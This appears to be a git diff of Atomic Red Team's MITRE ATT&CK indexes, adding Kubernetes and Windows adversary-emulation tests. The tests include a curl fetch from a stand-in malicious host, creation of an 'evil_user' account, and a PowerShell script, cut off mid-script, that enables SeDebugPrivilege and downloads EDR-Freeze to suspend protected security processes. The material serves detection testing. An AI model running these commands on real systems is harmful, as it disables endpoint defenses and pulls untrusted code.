 | Domain Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Lua [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Traffic Signaling [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Abuse Elevation Control Mechanism: Setuid and Setgid](../../T1548.001/T1548.001.md) | Hide Artifacts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Unsecured Credentials](../../T1552/T1552.md) | Application Window Discovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  | Archive Collected Data [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Data Transfer Size Limits](../../T1030/T1030.md) | External Proxy [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Financial Theft [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
 | Hardware Additions [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Exploitation for Client Execution [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Server Software Component: Web Shell [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [SSH Authorized Keys](../../T1098.004/T1098.004.md) | [Virtualization/Sandbox Evasion: System Checks](../../T1497.001/T1497.001.md) | [Credentials from Password Stores: Credentials from Web Browsers](../../T1555.003/T1555.003.md) | [Time Based Evasion](../../T1497.003/T1497.003.md) |  | DHCP Spoofing [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Exfiltration Over Physical Medium [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Proxy [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Defacement: Internal Defacement [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
 | Drive-by Compromise [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Command and Scripting Interpreter: Python](../../T1059.006/T1059.006.md) | Valid Accounts: Default Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | VDSO Hijacking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Indicator Removal on Host: Clear FreeBSD, Linux or Mac System Logs](../../T1070.002/T1070.002.md) | DHCP Spoofing [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Browser Bookmark Discovery](../../T1217/T1217.md) |  | Web Portal Capture [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Exfiltration Over Alternative Protocol: Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol](../../T1048.003/T1048.003.md) | IDE Tunneling [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Compute Hijacking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |

atomics/Indexes/Matrices/matrix.md

@@ -15,7 +15,7 @@
 | Phishing [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Command and Scripting Interpreter: AppleScript](../../T1059.002/T1059.002.md) | [Hijack Execution Flow: Services Registry Permissions Weakness](../../T1574.011/T1574.011.md) | [Boot or Logon Autostart Execution](../../T1547/T1547.md) | [Direct Volume Access](../../T1006/T1006.md) | [OS Credential Dumping: LSA Secrets](../../T1003.004/T1003.004.md) | [System Service Discovery](../../T1007/T1007.md) | [Remote Services: Distributed Component Object Model](../../T1021.003/T1021.003.md) | [Email Collection: Local Email Collection](../../T1114.001/T1114.001.md) | [Exfiltration Over Alternative Protocol](../../T1048/T1048.md) | [Protocol Tunneling](../../T1572/T1572.md) | Runtime Data Manipulation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
 | Valid Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Native API](../../T1106/T1106.md) | Bootkit [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Active Setup](../../T1547.014/T1547.014.md) | Modify Cloud Resource Hierarchy [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Forge Web Credentials: SAML token](../../T1606.002/T1606.002.md) | [Network Sniffing](../../T1040/T1040.md) | [Use Alternate Authentication Material: Pass the Ticket](../../T1550.003/T1550.003.md) | [Automated Collection](../../T1119/T1119.md) | Exfiltration over USB [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Mail Protocols [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Reflection Amplification [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
 | Spearphishing Voice [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Command and Scripting Interpreter: AutoHotKey & AutoIT](../../T1059.010/T1059.010.md) | [Boot or Logon Autostart Execution](../../T1547/T1547.md) | [Domain Trust Modification](../../T1484.002/T1484.002.md) | [Hide Artifacts: Email Hiding Rules](../../T1564.008/T1564.008.md) | [OS Credential Dumping: Proc Filesystem](../../T1003.007/T1003.007.md) | [Network Share Discovery](../../T1135/T1135.md) | Cloud Services [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Clipboard Data](../../T1115/T1115.md) | [Exfiltration Over Web Service: Exfiltration to Text Storage Sites](../../T1567.003/T1567.003.md) | Communication Through Removable Media [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Service Exhaustion Flood [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
-| Compromise Software Supply Chain [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Systemctl [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Active Setup](../../T1547.014/T1547.014.md) | [Create or Modify System Process: Windows Service](../../T1543.003/T1543.003.md) | [Obfuscated Files or Information: Encrypted/Encoded File](../../T1027.013/T1027.013.md) | Password Managers [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Peripheral Device Discovery](../../T1120/T1120.md) | [Software Deployment Tools](../../T1072/T1072.md) | [Data from Cloud Storage Object](../../T1530/T1530.md) | [Exfiltration Over Web Service: Exfiltration to Cloud Storage](../../T1567.002/T1567.002.md) | External Proxy [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Defacement [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
+| [Compromise Software Supply Chain](../../T1195.002/T1195.002.md) | Systemctl [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Active Setup](../../T1547.014/T1547.014.md) | [Create or Modify System Process: Windows Service](../../T1543.003/T1543.003.md) | [Obfuscated Files or Information: Encrypted/Encoded File](../../T1027.013/T1027.013.md) | Password Managers [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Peripheral Device Discovery](../../T1120/T1120.md) | [Software Deployment Tools](../../T1072/T1072.md) | [Data from Cloud Storage Object](../../T1530/T1530.md) | [Exfiltration Over Web Service: Exfiltration to Cloud Storage](../../T1567.002/T1567.002.md) | External Proxy [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Defacement [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
 | Domain Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Cloud API [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Browser Extensions [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Scheduled Task/Job: Cron](../../T1053.003/T1053.003.md) | [Rootkit](../../T1014/T1014.md) | [Network Sniffing](../../T1040/T1040.md) | [System Information Discovery](../../T1082/T1082.md) | Exploitation of Remote Services [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Remote Data Staging [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Data Transfer Size Limits](../../T1030/T1030.md) | Proxy [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Bandwidth Hijacking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
 | Hardware Additions [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Deploy a container](../../T1610/T1610.md) | TFTP Boot [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Account Manipulation: Additional Cloud Roles](../../T1098.003/T1098.003.md) | [Masquerading: Double File Extension](../../T1036.007/T1036.007.md) | [Unsecured Credentials: Credentials in Registry](../../T1552.002/T1552.002.md) | [System Network Configuration Discovery: Wi-Fi Discovery](../../T1016.002/T1016.002.md) | Internal Spearphishing [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Data from Local System](../../T1005/T1005.md) | Transfer Data to Cloud Account [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | IDE Tunneling [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Financial Theft [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
 | Drive-by Compromise [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Input Injection [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Create or Modify System Process: Windows Service](../../T1543.003/T1543.003.md) | [Boot or Logon Autostart Execution: Print Processors](../../T1547.012/T1547.012.md) | [Abuse Elevation Control Mechanism: Bypass User Account Control](../../T1548.002/T1548.002.md) | [Modify Authentication Process: Password Filter DLL](../../T1556.002/T1556.002.md) | [Application Window Discovery](../../T1010/T1010.md) | [Lateral Tool Transfer](../../T1570/T1570.md) | [Archive Collected Data: Archive via Library](../../T1560.002/T1560.002.md) | Exfiltration Over Physical Medium [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Dynamic Resolution [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Defacement: Internal Defacement](../../T1491.001/T1491.001.md) |

atomics/Indexes/azure-ad-index.yaml

@@ -63319,6 +63319,7 @@ initial-access:
       x_mitre_version: '1.1'
       x_mitre_data_sources:
       - 'File: File Metadata'
+      identifier: T1195.002
     atomic_tests: []
   T1078.002:
     technique:

atomics/Indexes/containers-index.yaml

@@ -24222,7 +24222,48 @@ privilege-escalation:
       - 'Process: Process Creation'
       - 'File: File Modification'
       identifier: T1053.002
-    atomic_tests: []
+    atomic_tests:
+    - name: At - Schedule a job via kubectl in a Pod
+      auto_generated_guid: 9ddf2e5e-7e2c-46c2-9940-3c2ff29c7213
+      description: |
+        Launches a short-lived Ubuntu pod, installs the `at` utility, starts the `atd` daemon,
+        and submits a job with `at`. The pod is deleted after execution.
+      supported_platforms:
+      - containers
+      input_arguments:
+        image_name:
+          description: Name of the image
+          type: string
+          default: ubuntu
+        pod_name:
+          description: K8s pod name to execute the command in
+          type: string
+          default: atomic-at-schedule
+        time_spec:
+          description: Time specification of when the command should run
+          type: string
+          default: now + 1 minute
+        at_command:
+          description: The command to be run
+          type: string
+          default: echo Hello from Atomic Red Team
+      dependencies:
+      - description: kubectl must be installed and configured
+        get_prereq_command: 'echo "kubectl must be installed manually"
+
+          '
+        prereq_command: 'which kubectl
+
+          '
+      executor:
+        name: bash
+        elevation_required: false
+        command: 'kubectl run #{pod_name} --image=#{image_name} --restart=Never --attach
+          --rm -i -- bash -lc "apt-get update -y >/dev/null 2>&1 && apt-get install
+          -y at >/dev/null 2>&1 && (atd || /usr/sbin/atd) && echo ''#{at_command}''
+          | at #{time_spec} && at -l"
+
+          '
   T1055.001:
     technique:
       type: attack-pattern
@@ -27881,7 +27922,48 @@ execution:
       - 'Process: Process Creation'
       - 'File: File Modification'
       identifier: T1053.002
-    atomic_tests: []
+    atomic_tests:
+    - name: At - Schedule a job via kubectl in a Pod
+      auto_generated_guid: 9ddf2e5e-7e2c-46c2-9940-3c2ff29c7213
+      description: |
+        Launches a short-lived Ubuntu pod, installs the `at` utility, starts the `atd` daemon,
+        and submits a job with `at`. The pod is deleted after execution.
+      supported_platforms:
+      - containers
+      input_arguments:
+        image_name:
+          description: Name of the image
+          type: string
+          default: ubuntu
+        pod_name:
+          description: K8s pod name to execute the command in
+          type: string
+          default: atomic-at-schedule
+        time_spec:
+          description: Time specification of when the command should run
+          type: string
+          default: now + 1 minute
+        at_command:
+          description: The command to be run
+          type: string
+          default: echo Hello from Atomic Red Team
+      dependencies:
+      - description: kubectl must be installed and configured
+        get_prereq_command: 'echo "kubectl must be installed manually"
+
+          '
+        prereq_command: 'which kubectl
+
+          '
+      executor:
+        name: bash
+        elevation_required: false
+        command: 'kubectl run #{pod_name} --image=#{image_name} --restart=Never --attach
+          --rm -i -- bash -lc "apt-get update -y >/dev/null 2>&1 && apt-get install
+          -y at >/dev/null 2>&1 && (atd || /usr/sbin/atd) && echo ''#{at_command}''
+          | at #{time_spec} && at -l"
+
+          '
 persistence:
   T1053.005:
     technique:
@@ -31868,7 +31950,42 @@ persistence:
       - 'Process: Process Creation'
       - 'Command: Command Execution'
       identifier: T1136.001
-    atomic_tests: []
+    atomic_tests:
+    - name: Create a Linux user via kubectl in a Pod
+      auto_generated_guid: d9efa6c7-6518-42b2-809a-4f2a8e242b9b
+      description: |
+        Launches a short-lived Alpine pod and creates a Linux user inside the pod.
+        The pod is automatically deleted after execution.
+      supported_platforms:
+      - containers
+      input_arguments:
+        pod_name:
+          description: K8s pod_name to execute the command in
+          type: string
+          default: atomic-linux-useradd
+        username:
+          description: Username of the user to create inside the pod
+          type: string
+          default: evil_user
+        image_name:
+          description: Name of the docker image
+          type: string
+          default: alpine
+      dependencies:
+      - description: kubectl must be installed and configured
+        get_prereq_command: 'echo "kubectl must be installed manually"
+
+          '
+        prereq_command: 'which kubectl
+
+          '
+      executor:
+        name: bash
+        elevation_required: false
+        command: 'kubectl run #{pod_name} --image=#{image_name} --restart=Never --rm
+          -it -- sh -lc ''adduser -D #{username} && id #{username}''
+
+          '
   T1176.002:
     technique:
       type: attack-pattern
@@ -37108,7 +37225,48 @@ persistence:
       - 'Process: Process Creation'
       - 'File: File Modification'
       identifier: T1053.002
-    atomic_tests: []
+    atomic_tests:
+    - name: At - Schedule a job via kubectl in a Pod
+      auto_generated_guid: 9ddf2e5e-7e2c-46c2-9940-3c2ff29c7213
+      description: |
+        Launches a short-lived Ubuntu pod, installs the `at` utility, starts the `atd` daemon,
+        and submits a job with `at`. The pod is deleted after execution.
+      supported_platforms:
+      - containers
+      input_arguments:
+        image_name:
+          description: Name of the image
+          type: string
+          default: ubuntu
+        pod_name:
+          description: K8s pod name to execute the command in
+          type: string
+          default: atomic-at-schedule
+        time_spec:
+          description: Time specification of when the command should run
+          type: string
+          default: now + 1 minute
+        at_command:
+          description: The command to be run
+          type: string
+          default: echo Hello from Atomic Red Team
+      dependencies:
+      - description: kubectl must be installed and configured
+        get_prereq_command: 'echo "kubectl must be installed manually"
+
+          '
+        prereq_command: 'which kubectl
+
+          '
+      executor:
+        name: bash
+        elevation_required: false
+        command: 'kubectl run #{pod_name} --image=#{image_name} --restart=Never --attach
+          --rm -i -- bash -lc "apt-get update -y >/dev/null 2>&1 && apt-get install
+          -y at >/dev/null 2>&1 && (atd || /usr/sbin/atd) && echo ''#{at_command}''
+          | at #{time_spec} && at -l"
+
+          '
   T1556:
     technique:
       type: attack-pattern
@@ -40196,7 +40354,40 @@ command-and-control:
       - 'Command: Command Execution'
       - 'Network Traffic: Network Connection Creation'
       identifier: T1105
-    atomic_tests: []
+    atomic_tests:
+    - name: Curl Insecure Connection from a Pod
+      auto_generated_guid: 7e2ad0db-1efa-4af2-a77c-bc6e87d7b3f3
+      description: |
+        Launches an Ubuntu pod, installs curl, and executes curl with insecure flags (-k/--insecure)
+        against a target URL. The pod is automatically deleted after execution.
+      supported_platforms:
+      - containers
+      input_arguments:
+        pod_name:
+          description: K8s pod_name to execute the command in
+          type: string
+          default: atomic-insecure-curl
+        remote_url:
+          description: Remote URL to curl
+          type: string
+          default: https://malicious-apt.com
+        image_name:
+          description: Name of the docker image
+          type: string
+          default: curlimages/curl
+      dependencies:
+      - description: kubectl must be installed and configured
+        get_prereq_command: 'echo "kubectl must be installed manually"
+
+          '
+        prereq_command: 'which kubectl
+
+          '
+      executor:
+        name: bash
+        elevation_required: false
+        command: 'kubectl run #{pod_name} --image=#{image_name} --restart=Never --rm
+          -it -- curl -ksL #{remote_url}'
   T1665:
     technique:
       type: attack-pattern
@@ -62473,7 +62664,47 @@ initial-access:
       x_mitre_version: '1.1'
       x_mitre_data_sources:
       - 'File: File Metadata'
-    atomic_tests: []
+      identifier: T1195.002
+    atomic_tests:
+    - name: Simulate npm package installation on a Linux system
+      auto_generated_guid: a9604672-cd46-493b-b58f-fd4124c22dd3
+      description: 'Launches a short‑lived Kubernetes pod using the Node 18 image,
+        initializes a minimal npm project in /tmp/test, and installs the specified
+        npm package without audit/fund/package‑lock options, simulating potentially
+        suspicious package retrieval (e.g., typosquatting/dependency confusion) from
+        within a container. The pod is deleted after execution.
+
+        '
+      supported_platforms:
+      - containers
+      - linux
+      input_arguments:
+        image_name:
+          description: Name of the image
+          type: string
+          default: node:18
+        pod_name:
+          description: Name of the pod
+          type: string
+          default: atomic-npm-install
+        package_name:
+          description: NPM package to install
+          type: string
+          default: tinycolor
+      dependencies:
+      - description: kubectl must be installed and configured
+        get_prereq_command: echo "kubectl must be installed"
+        prereq_command: which kubectl
+      executor:
+        name: bash
+        elevation_required: false
+        command: 'kubectl run #{pod_name} --image=#{image_name} --restart=Never --attach
+          --rm -i -- bash -lc "mkdir -p /tmp/test && cd /tmp/test && npm init -y >/dev/null
+          2>&1 && echo ''--- package.json before install ---'' && cat package.json
+          && npm install #{package_name} --no-audit --no-fund --no-package-lock &&
+          echo ''--- package.json after install ---'' && cat package.json"
+
+          '
   T1078.002:
     technique:
       type: attack-pattern

atomics/Indexes/esxi-index.yaml

@@ -61674,6 +61674,7 @@ initial-access:
       x_mitre_version: '1.1'
       x_mitre_data_sources:
       - 'File: File Metadata'
+      identifier: T1195.002
     atomic_tests: []
   T1078.002:
     technique:

atomics/Indexes/google-workspace-index.yaml

@@ -61848,6 +61848,7 @@ initial-access:
       x_mitre_version: '1.1'
       x_mitre_data_sources:
       - 'File: File Metadata'
+      identifier: T1195.002
     atomic_tests: []
   T1078.002:
     technique:

atomics/Indexes/iaas-index.yaml

@@ -61674,6 +61674,7 @@ initial-access:
       x_mitre_version: '1.1'
       x_mitre_data_sources:
       - 'File: File Metadata'
+      identifier: T1195.002
     atomic_tests: []
   T1078.002:
     technique:

atomics/Indexes/iaas_aws-index.yaml

@@ -12171,9 +12171,9 @@ defense-evasion:
         command: |
           aws logs create-log-group --log-group-name #{cloudwatch_log_group_name} --region #{region} --output json
           echo "*** Log Group Created ***"
-          aws logs create-log-stream --log-group-name #{cloudwatch_log_group_name} --log-stream-name #{cloudwatch_log_stream_name}
+          aws logs create-log-stream --log-group-name #{cloudwatch_log_group_name} --log-stream-name #{cloudwatch_log_stream_name} --region #{region}
           echo "*** Log Stream Created ***"
-          aws logs delete-log-stream --log-group-name #{cloudwatch_log_group_name} --log-stream-name #{cloudwatch_log_stream_name}
+          aws logs delete-log-stream --log-group-name #{cloudwatch_log_group_name} --log-stream-name #{cloudwatch_log_stream_name} --region #{region}
           echo "*** Log Stream Deleted ***"
           aws logs delete-log-group --log-group-name #{cloudwatch_log_group_name} --region #{region} --output json
           echo "*** Log Group Deleted ***"
@@ -62752,6 +62752,7 @@ initial-access:
       x_mitre_version: '1.1'
       x_mitre_data_sources:
       - 'File: File Metadata'
+      identifier: T1195.002
     atomic_tests: []
   T1078.002:
     technique:

atomics/Indexes/iaas_azure-index.yaml

@@ -63058,6 +63058,7 @@ initial-access:
       x_mitre_version: '1.1'
       x_mitre_data_sources:
       - 'File: File Metadata'
+      identifier: T1195.002
     atomic_tests: []
   T1078.002:
     technique:

atomics/Indexes/iaas_gcp-index.yaml

@@ -62338,6 +62338,7 @@ initial-access:
       x_mitre_version: '1.1'
       x_mitre_data_sources:
       - 'File: File Metadata'
+      identifier: T1195.002
     atomic_tests: []
   T1078.002:
     technique:

atomics/Indexes/index.yaml

@@ -6569,10 +6569,9 @@ defense-evasion:
           type: path
           default: myapp.app
       executor:
-        command: 'sudo xattr -d com.apple.quarantine #{app_path}
+        command: 'xattr -d com.apple.quarantine #{app_path}
 
           '
-        elevation_required: true
         name: sh
   T1553.002:
     technique:
@@ -8682,6 +8681,36 @@ defense-evasion:
         cleanup_command:
         name: bash
         elevation_required: false
+    - name: Expand CAB with expand.exe
+      auto_generated_guid: 9f8b1c54-cb76-4d5e-bb1f-2f5c0e8f5a11
+      description: |
+        Uses expand.exe to extract a file from a CAB created locally. This simulates adversarial use of expand on cabinet archives.
+        Upon success, art-expand-source.txt is extracted next to the CAB.
+      supported_platforms:
+      - windows
+      input_arguments:
+        cab_path:
+          description: Path to the CAB to expand (created if missing)
+          type: path
+          default: "%TEMP%\\art-expand-test.cab"
+        output_dir:
+          description: Destination directory
+          type: path
+          default: "%TEMP%\\art-expand-out"
+      executor:
+        name: command_prompt
+        elevation_required: false
+        command: |
+          mkdir "#{output_dir}" >nul 2>&1
+          echo hello from atomic red team > "PathToAtomicsFolder\T1140\src\art-expand-source.txt"
+          makecab "PathToAtomicsFolder\T1140\src\art-expand-source.txt" "#{cab_path}"
+          pushd "#{output_dir}"
+          expand "#{cab_path}" -F:* .
+          popd
+        cleanup_command: |
+          del "PathToAtomicsFolder\T1140\src\art-expand-source.txt" >nul 2>&1
+          del "#{cab_path}" >nul 2>&1
+          rmdir "#{output_dir}" /s /q >nul 2>&1
   T1562:
     technique:
       type: attack-pattern
@@ -23585,6 +23614,127 @@ defense-evasion:
           -Name Enabled -Value 1 -PropertyType "DWord" -Force
         name: powershell
         elevation_required: true
+    - name: Freeze PPL-protected process with EDR-Freeze
+      auto_generated_guid: cbb2573a-a6ad-4c87-aef8-6e175598559b
+      description: This test utilizes the tool EDR-Freeze, which leverages the native
+        Microsoft binary WerFaultSecure.exe to suspend processes protected by the
+        Protected Process Light mechanism. PPL is a Windows security feature designed
+        to safeguard critical system processes — such as those related to antivirus,
+        credential protection, and system integrity — from tampering or inspection.
+        These processes operate in a restricted environment that prevents access even
+        from administrators or debugging tools, unless the accessing tool is signed
+        and trusted by Microsoft. By using WerFaultSecure.exe, which is inherently
+        trusted by the operating system, EDR-Freeze is able to bypass these restrictions
+        and temporarily freeze PPL-protected processes for analysis or testing purposes.
+      supported_platforms:
+      - windows
+      input_arguments:
+        processName:
+          type: string
+          default: SecurityHealthService
+          description: PPL-protected process name to target
+      executor:
+        command: "# Enable SeDebugPrivilege\nAdd-Type -TypeDefinition @\"\nusing System;\nusing
+          System.Runtime.InteropServices;\n\npublic class TokenAdjuster {\n    [DllImport(\"advapi32.dll\",
+          SetLastError = true)]\n    public static extern bool OpenProcessToken(IntPtr
+          ProcessHandle, uint DesiredAccess, out IntPtr TokenHandle);\n\n    [DllImport(\"advapi32.dll\",
+          SetLastError = true)]\n    public static extern bool LookupPrivilegeValue(string
+          lpSystemName, string lpName, out long lpLuid);\n\n    [DllImport(\"advapi32.dll\",
+          SetLastError = true)]\n    public static extern bool AdjustTokenPrivileges(IntPtr
+          TokenHandle, bool DisableAllPrivileges,\n        ref TOKEN_PRIVILEGES NewState,
+          uint BufferLength, IntPtr PreviousState, IntPtr ReturnLength);\n\n    [StructLayout(LayoutKind.Sequential,
+          Pack = 1)]\n    public struct TOKEN_PRIVILEGES {\n        public int PrivilegeCount;\n
+          \       public long Luid;\n        public int Attributes;\n    }\n\n    public
+          const int SE_PRIVILEGE_ENABLED = 0x00000002;\n    public const uint TOKEN_ADJUST_PRIVILEGES
+          = 0x0020;\n    public const uint TOKEN_QUERY = 0x0008;\n\n    public static
+          bool EnableSeDebugPrivilege() {\n        IntPtr hToken;\n        if (!OpenProcessToken(System.Diagnostics.Process.GetCurrentProcess().Handle,
+          TOKEN_ADJUST_PRIVILEGES | TOKEN_QUERY, out hToken))\n            return
+          false;\n\n        long luid;\n        if (!LookupPrivilegeValue(null, \"SeDebugPrivilege\",
+          out luid))\n            return false;\n\n        TOKEN_PRIVILEGES tp = new
+          TOKEN_PRIVILEGES();\n        tp.PrivilegeCount = 1;\n        tp.Luid = luid;\n
+          \       tp.Attributes = SE_PRIVILEGE_ENABLED;\n\n        return AdjustTokenPrivileges(hToken,
+          false, ref tp, 0, IntPtr.Zero, IntPtr.Zero);\n    }\n}\n\"@\n\n$result =
+          [TokenAdjuster]::EnableSeDebugPrivilege()\nif ($result) {\n    Write-Host
+          \"SeDebugPrivilege enabled successfully.\" -ForegroundColor Green\n} else
+          {\n    Write-Host \"Failed to enable SeDebugPrivilege.\" -ForegroundColor
+          Red\n    exit 1\n}\n\n# Get basic process info\n$process = Get-Process -Name
+          $#{processName} -ErrorAction Stop\n$processName = $process.ProcessName\nWrite-Host
+          \"Process Name: $processName)\"\nWrite-Host \"PID: $($process.Id)\"\n        \n#
+          Get executable path and user info\n$query = \"SELECT * FROM Win32_Process
+          WHERE Name = '$processName.exe'\"\n$wmiProcess = Get-WmiObject -Query $query\n\n$owner
+          = $wmiProcess.GetOwner()\n    Write-Host \"User: $($owner.Domain)\\$($owner.User)\"\n\n\n#
+          Get the folder of the current script\n$scriptFolder = Split-Path -Parent
+          $MyInvocation.MyCommand.Definition\n\n# Download latest EDR-Freeze package
+          and extract (force replace)\n$downloadUrl = \"https://github.com/TwoSevenOneT/EDR-Freeze/releases/download/main/EDR-Freeze_1.0.zip\"\n$zipPath
+          = Join-Path $scriptFolder \"EDR-Freeze_1.0.zip\"\nWrite-Host \"Downloading
+          latest EDR-Freeze from $downloadUrl\" -ForegroundColor Cyan\ntry {\n    Invoke-WebRequest
+          -Uri $downloadUrl -OutFile $zipPath -UseBasicParsing -ErrorAction Stop\n
+          \   Write-Host \"Download completed: $zipPath\" -ForegroundColor Green\n
+          \   $extractFolder = $scriptFolder\n    if (Test-Path $zipPath) {\n        Write-Host
+          \"Extracting archive to $extractFolder (overwriting existing files)\" -ForegroundColor
+          Cyan\n        if (Test-Path $extractFolder) {\n            # Ensure target
+          exe not locked; attempt to stop any running instance silently\n            Get-Process
+          -Name \"EDR-Freeze_1.0\" -ErrorAction SilentlyContinue | Stop-Process -Force
+          -ErrorAction SilentlyContinue\n        }\n        Add-Type -AssemblyName
+          System.IO.Compression.FileSystem 2>$null\n        # Custom extraction routine
+          (overwrite existing) compatible with .NET Framework (no bool overwrite overload)\n
+          \       $archive = $null\n        try {\n            $archive = [System.IO.Compression.ZipFile]::OpenRead($zipPath)\n
+          \           foreach ($entry in $archive.Entries) {\n                if ([string]::IsNullOrWhiteSpace($entry.FullName))
+          { continue }\n                if ($entry.FullName.EndsWith('/')) { # directory
+          entry\n                    $dirPath = Join-Path $extractFolder $entry.FullName\n
+          \                   if (-not (Test-Path $dirPath)) { New-Item -ItemType
+          Directory -Path $dirPath -Force | Out-Null }\n                    continue\n
+          \               }\n                $destPath = Join-Path $extractFolder
+          $entry.FullName\n                $destDir = Split-Path $destPath -Parent\n
+          \               if (-not (Test-Path $destDir)) { New-Item -ItemType Directory
+          -Path $destDir -Force | Out-Null }\n                if (Test-Path $destPath)
+          { Remove-Item -Path $destPath -Force -ErrorAction SilentlyContinue }\n                try
+          {\n                    # Use static extension method (PowerShell 5.1 compatible)\n
+          \                   [System.IO.Compression.ZipFileExtensions]::ExtractToFile($entry,
+          $destPath, $false)\n                } catch {\n                    Write-Host
+          \"Failed to extract entry $($entry.FullName): $_\" -ForegroundColor Yellow\n
+          \               }\n            }\n            Write-Host \"Extraction completed.\"
+          -ForegroundColor Green\n        } finally {\n            if ($archive) {
+          $archive.Dispose() }\n        }\n    }\n} catch {\n    Write-Host \"Failed
+          to download or extract EDR-Freeze: $_\" -ForegroundColor Red\n}\n\n# Wait
+          15s before putting targeted process before putting it in the comma\nWrite-Host
+          \"Waiting 15s before putting $processName in the comma\" -ForegroundColor
+          Yellow\nStart-Sleep -Seconds 5\nWrite-Host \"Waiting 10s before putting
+          $processName in the comma\" -ForegroundColor Yellow\nStart-Sleep -Seconds
+          5\nWrite-Host \"Waiting 5s before putting $processName in the comma\" -ForegroundColor
+          Yellow\nStart-Sleep -Seconds 3\nWrite-Host \"Waiting 2s before putting $processName
+          in the comma\" -ForegroundColor Yellow\nStart-Sleep -Seconds 2\n\n# Put
+          targeted  process in the comma for 15s\n# Discover the EDR-Freeze executable
+          dynamically (pick most recent if multiple)\n$edrFreezeExeName = Get-ChildItem
+          -Path $scriptFolder -Filter 'EDR-Freeze_*.exe' -ErrorAction SilentlyContinue
+          |\n    Sort-Object LastWriteTime -Descending |\n    Select-Object -First
